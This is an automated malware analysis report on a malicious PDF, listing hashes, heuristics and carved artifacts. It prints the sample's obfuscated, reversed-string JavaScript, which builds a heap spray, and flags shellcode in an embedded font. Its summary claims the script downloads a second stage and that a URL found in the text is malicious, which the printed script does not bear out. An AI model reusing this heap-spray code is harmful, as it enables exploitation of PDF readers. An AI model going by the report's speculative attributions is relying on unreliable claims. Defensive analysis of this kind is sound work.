Malicious PDF — malware analysis report

Static analysis result for SHA-256 0041b0a5060130f2…

Verdict: MALICIOUS
File type: PDF
Size: 67.7 KB
First seen: 2013-02-03
MD5: 3ef5f19d4a0146eca63437c1dceb7d2e
SHA-1: 338fa77036af688fd842d89b12c9ce3ec7b4b1a6
SHA-256: 0041b0a5060130f2a61aa635f35a70580aa54293a9f8fe437c8c53fcdc6d94ba
Risk score: 68

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment

The sample is a PDF containing obfuscated JavaScript, flagged by ML classifiers as malicious. The script reconstructs and executes a string that appears to be designed to download and execute a second-stage payload. The embedded URL http://www.bitstream.com is likely part of this malicious chain.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics (4)

  • Suspicious extracted artifact (medium) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (low, 1 related finding) [PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low) [PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com: in PDF document text

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0012_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 12 at offset 0x10A83
Size: 740 bytes
SHA-256: 057b12456c7cffb9208ee860f5daf31d68116634df0b018cc11cfe45e7361c98
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Script preview (first 1,000 lines of the extracted script):
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
Filename: font_00_sfnt_off0000035e.bin
Kind: pdf-font-stream
Source: PDF embedded font (sfnt) at offset 0x35E
Size: 67284 bytes
SHA-256: 35b6962eeb9aa4a8acb1109b74102eb9d08ab437da4460a890e43cabdc8c59d3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)